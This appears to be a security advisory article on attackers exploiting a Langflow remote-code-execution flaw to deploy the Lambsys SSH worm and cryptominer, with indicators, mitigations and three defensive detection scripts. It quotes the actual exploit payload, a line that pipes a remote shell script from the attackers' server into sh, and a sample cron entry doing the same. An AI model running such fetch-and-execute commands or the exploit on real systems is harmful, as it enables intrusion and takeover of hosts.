On March 27, 2026, unidentified threat actors began exploiting CVE-2026-33017, an unauthenticated RCE vulnerability in the Langflow AI framework, to deploy Lambsys: a Go-based SSH worm that turns a single prototyping endpoint into an enterprise-wide breach. The campaign lasted 19 days. The lesson lasts much longer.
- The initial payload is a single line of Python executed via exec() on the /api/v1/build_public_tmp/{flow_id}/flow endpoint, enabled by Langflow's default AUTO_LOGIN
- Lambsys terminates 39 competing miner processes, disables AppArmor, SELinux, UFW and iptables, establishes dual-mechanism persistence, and propagates via reused SSH keys
- A variant of the same family was compiled in May 2024: the payload has existed for two years; the AI vector is new
- The CVE is in the CISA KEV catalog with required action by April 8, 2026; the patch is available in Langflow 1.9.0
The Endpoint That Should Not Have Existed
Langflow is a visual prototyping tool for AI/ML flows. Its POST /api/v1/build_public_tmp/{flow_id}/flow endpoint accepts a code parameter containing Python executed directly via exec() without any sandbox. Trend Micro documented this behavior as a server-side RCE primitive.
The default configuration amplifies the problem. AUTO_LOGIN, enabled out of the box, allows an unauthenticated visitor to obtain a superuser token and create public flows on demand. According to Trend Micro researchers Simon Dulude and John Zhang, cited by The Hacker News, "a single line of Python code evaluated inside an unauthenticated Langflow API endpoint pulls down a shell script, fetches a miner binary, and launches it detached."
The specific payload observed: __import__('os').system('curl hxxp[://]83[.]142[.]209[.]214:8080/isp.sh | sh'), with a hardcoded UUID flow_id of 0ee284cc-0eb1-493f-bc60-94fa8d1cfd18. Ten reconnaissance requests from the seed IP earlier the same day preceded the exploit at 19:15:04.
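A log-review sketch for the request pattern described above, added here as an example and not taken from Trend Micro or the Langflow project. It assumes a reverse proxy writing combined-format access logs in front of Langflow; the function name and the sample lines are constructed for illustration.

```python
import re
from collections import defaultdict

# Combined log format; the reverse-proxy log layout is an assumption.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"[^"]*" "(?P<ua>[^"]*)"$'
)
# Endpoint named in the article; any UUID is accepted as flow_id.
BUILD_RE = re.compile(
    r'^/api/v1/build_public_tmp/(?P<flow>[0-9a-fA-F-]{36})/flow/?(?:\?.*)?$'
)

def find_build_public_posts(lines):
    """Return {source_ip: [hit, ...]} for POSTs to the public build endpoint."""
    hits = defaultdict(list)
    for line in lines:
        m = LOG_RE.match(line.strip())
        if not m or m["method"] != "POST":
            continue
        b = BUILD_RE.match(m["path"])
        if not b:
            continue
        hits[m["ip"]].append({
            "ts": m["ts"],
            "flow_id": b["flow"].lower(),
            "status": int(m["status"]),
            # UA is only a hint: the article notes some requests spoofed it.
            "scripted_ua": m["ua"].startswith("python-requests/"),
        })
    return dict(hits)

# Constructed sample lines (documentation IP ranges, not campaign data).
FLOW = "0ee284cc-0eb1-493f-bc60-94fa8d1cfd18"  # flow_id quoted in the article
SAMPLE = [
    '203.0.113.7 - - [27/Mar/2026:18:40:10 +0000] "GET / HTTP/1.1" 200 812 "-" "python-requests/2.25.1"',
    f'203.0.113.7 - - [27/Mar/2026:19:15:04 +0000] "POST /api/v1/build_public_tmp/{FLOW}/flow HTTP/1.1" 200 512 "-" "python-requests/2.25.1"',
    '198.51.100.20 - - [28/Mar/2026:02:11:37 +0000] "POST /api/v1/build_public_tmp/11111111-2222-3333-4444-555555555555/flow HTTP/1.1" 200 498 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
    '192.0.2.44 - - [28/Mar/2026:02:12:01 +0000] "POST /api/v1/other HTTP/1.1" 401 120 "-" "curl/8.5.0"',
]

if __name__ == "__main__":
    for ip, found in find_build_public_posts(SAMPLE).items():
        print(ip, found)
```

Any POST to this endpoint from an address outside the team that owns the instance deserves review regardless of user-agent.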
Lambsys' Rigid Sequence
The downloaded binary, lambsys.elf, is a UPX-packed Go executable of approximately 296 KB. Its operational architecture leaves nothing to chance: it terminates 39 competing miner processes belonging to known families (Kinsing, WatchDog, Rocke, Outlaw) as well as processes on 13 TCP mining ports, disables security controls, establishes persistence, beacons to C2, and finally propagates.
Defense neutralization is systematic: AppArmor, SELinux, UFW, iptables, NMI watchdog, and Aliyun agent. Persistence relies on two independent mechanisms — a cron job every five minutes and a bash init_rmount loop every sixty seconds — both with re-download capability from the command server.
Lateral propagation exploits SSH key reuse: the malware enumerates ~/.ssh/known_hosts, id_rsa, id_ed25519, and agent sockets to automatically pivot to accessible hosts. The custom XMRig miner, downloaded as ks.tar from C2 83.142.209[.]214 with MD5 verification, connects to pools on TCP/3333 spoofing the user-agent as SystemMonitor/6.25.0.
"Lambsys does not run its attack logic as Go functions. Instead, it forks a cascade of short-lived sh -c subprocesses... The design trades stealth for reliability"
— Trend Micro researchers Simon Dulude and John Zhang, via The Hacker News
19 Days and a Family with History
The observation window documented by Trend Micro spans March 27 to April 15, 2026: eight exploit POSTs from the seed IP, with 43 of 61 requests presenting the user-agent python-requests/2.25.1 and the rest with spoofed UAs. C2 beaconing occurs via JSON POST to /status.php at roughly 128-second intervals.
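The beacon cadence described above lends itself to an interval check over egress logs. The following is an added example, not code from Trend Micro; the record layout, the tolerance of 15 seconds, the minimum sample count and the 75% ratio are assumptions chosen for illustration, and the events are constructed.

```python
from statistics import median

def find_beacons(events, path="/status.php", expected=128, tolerance=15,
                 min_count=4, min_ratio=0.75):
    """Flag (src, dst) pairs POSTing to `path` at a steady ~`expected`-second gap.

    events: iterable of (epoch_seconds, src, dst, method, url_path).
    """
    by_pair = {}
    for ts, src, dst, method, url_path in events:
        if method == "POST" and url_path == path:
            by_pair.setdefault((src, dst), []).append(ts)

    flagged = []
    for (src, dst), stamps in by_pair.items():
        if len(stamps) < min_count:
            continue  # too few samples to call it periodic
        stamps.sort()
        gaps = [b - a for a, b in zip(stamps, stamps[1:])]
        in_band = sum(1 for g in gaps if abs(g - expected) <= tolerance)
        med = median(gaps)
        if abs(med - expected) <= tolerance and in_band / len(gaps) >= min_ratio:
            flagged.append({"src": src, "dst": dst,
                            "median_gap": med, "count": len(stamps)})
    return flagged

# Constructed egress records (documentation IP ranges, not campaign data).
T0 = 1774638000
EVENTS = (
    # Steady ~128 s cadence: should be flagged.
    [(T0 + off, "10.0.0.5", "203.0.113.50", "POST", "/status.php")
     for off in (0, 127, 256, 383, 512)]
    # Same path but irregular timing: should not be flagged.
    + [(T0 + off, "10.0.0.9", "198.51.100.8", "POST", "/status.php")
       for off in (0, 30, 400, 405)]
    # Unrelated traffic from the first host is ignored.
    + [(T0 + 60, "10.0.0.5", "203.0.113.50", "GET", "/index.html")]
)

if __name__ == "__main__":
    for hit in find_beacons(EVENTS):
        print(hit)
```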
The most disturbing finding is payload continuity. An artifact of the same Lambsys family, with the same filename and install path, was compiled in May 2024 — more than two years before the Langflow campaign. As the Trend Micro research team observed: "The payloads behind the door have existed, in some cases with the same filename and install path, since at least May 2024. The delivery vector is the only thing that moved."
The vector changed, the malware did not. This is not technical innovation by the operators, but opportunistic repositioning: commodity cryptominer operators now mass-scan exposed AI application endpoints.
What to Do Now
- Update Langflow to version 1.9.0, which fixes CVE-2026-33017 per official release notes and the NVD record
- Disable AUTO_LOGIN in internet-exposed environments, eliminating the unauthenticated attack surface documented by Trend Micro
- Rotate or regenerate SSH keys on hosts that ran vulnerable Langflow versions, given Lambsys' ability to extract and reuse id_rsa, id_ed25519, and agent sockets
- Check for suspicious cron jobs with five-minute intervals and init_rmount processes, documented indicators of the dual-mechanism persistence
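A triage sketch for the last check, added here as an example and not part of the original article or the Trend Micro report. It assumes crontab contents and `ps -eo pid,args` output have been collected as text; the function names, the sample host, and the way init_rmount shows up in the process list are constructed for illustration.

```python
import re

FETCH_RE = re.compile(r'\b(curl|wget)\b')

def five_minute_cron_entries(crontab_text):
    """Return cron lines on a */5 schedule, noting whether they fetch remotely."""
    findings = []
    for raw in crontab_text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue  # skip blanks, comments and VAR=value lines
        fields = line.split(None, 5)
        if len(fields) < 6:
            continue
        # In /etc/crontab or /etc/cron.d the sixth field starts with a user
        # name; searching the whole remainder still works.
        if fields[0] == "*/5" and all(f == "*" for f in fields[1:5]):
            findings.append({"line": line,
                             "fetches_remote": bool(FETCH_RE.search(fields[5]))})
    return findings

def init_rmount_processes(ps_text):
    """Return (pid, args) for processes whose command line mentions init_rmount."""
    found = []
    for line in ps_text.splitlines():
        parts = line.split(None, 1)
        if len(parts) == 2 and parts[0].isdigit() and "init_rmount" in parts[1]:
            found.append((int(parts[0]), parts[1]))
    return found

# Constructed samples: placeholder host and paths, not values from the campaign.
CRONTAB = """# m h dom mon dow command
SHELL=/bin/sh
*/5 * * * * curl -fsSL http://c2.example.invalid/payload.sh | sh
*/5 * * * * /usr/local/bin/rotate-logs.sh
0 3 * * * /usr/bin/backup.sh
"""
PS_OUTPUT = """  PID COMMAND
    1 /sbin/init
 4211 bash -c while true; do init_rmount; sleep 60; done
 4300 sshd: /usr/sbin/sshd -D
"""

if __name__ == "__main__":
    print(five_minute_cron_entries(CRONTAB))
    print(init_rmount_processes(PS_OUTPUT))
```

A five-minute schedule alone is common in legitimate jobs; the entries worth escalating are those that also fetch from a remote host.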
The Paradox of the Familiar Vector
While CISOs invest in guardrails, prompt injection defenses, and model alignment, the first significant wave of real-world attacks against AI infrastructure exploits elementary failures: absent authentication, missing sandboxing, insecure default configurations. Langflow is not an isolated case but a sample of a broader class — AI/ML frameworks exposed where prototyping speed preceded security-by-design.
The risk perception gap is structural. AI/ML teams may not consider Langflow a critical attack surface: it is an internal, development, temporary tool. Yet an endpoint with default AUTO_LOGIN and unsandboxed exec() is, technically, an arbitrary remote compute server exposed to the internet. The familiarity of the payload — a commodity cryptominer — combined with the novelty of the vector creates exactly the response delay that operators exploit.
Responsibility for security debt in open-source AI tools still lacks a clear owner: between maintainers prioritizing adoption, vendors not auditing AI dependencies, and teams deploying without hardening, the chain breaks at the point most convenient for the attacker. The 19 days of this campaign suggest that, for now, that point is wide open.
FAQ
- Does Langflow 1.9.0 fully resolve the vulnerability?
- According to the NVD record and Trend Micro analyses, version 1.9.0 contains the fix. The dossier does not specify the presence of bypasses or variants.
- Why does the malware propagate via SSH instead of exploiting other Langflow endpoints?
- Lambsys implements lateral propagation via SSH key reuse as its primary strategy. The dossier does not document alternative movement techniques based on Langflow itself.
- Is the campaign linked to the Sysdig exploit observed on March 20, 2026 on the same CVE?
- The brief documents the same CVE but a different payload: credential harvesting versus cryptominer. No infrastructure overlaps linking the two campaigns emerge at this time.
Sources
- https://thehackernews.com/2026/06/langflow-rce-exploited-to-deploy-monero.html
- https://gbhackers.com/langflow-rce-vulnerability-exploited/
- https://www.trendmicro.com/en/research/26/f/from-langflow-to-monero-inside-cve-2026-33017-cryptominer.html
- https://www.infosecurity-magazine.com/news/hackers-exploit-critical-langflow/
- https://www.trendmicro.com/en_us/research/26/f/from-langflow-to-monero-inside-cve-2026-33017-cryptominer.html
- https://cyberpress.org/ai-powered-ios-applications-exposed/
- https://nvd.nist.gov/vuln/detail/cve-2026-33017
- https://thehackernews.com/
- https://thehackernews.com/p/upcoming-hacker-news-webinars.html
Information verified against cited sources and current as of publication.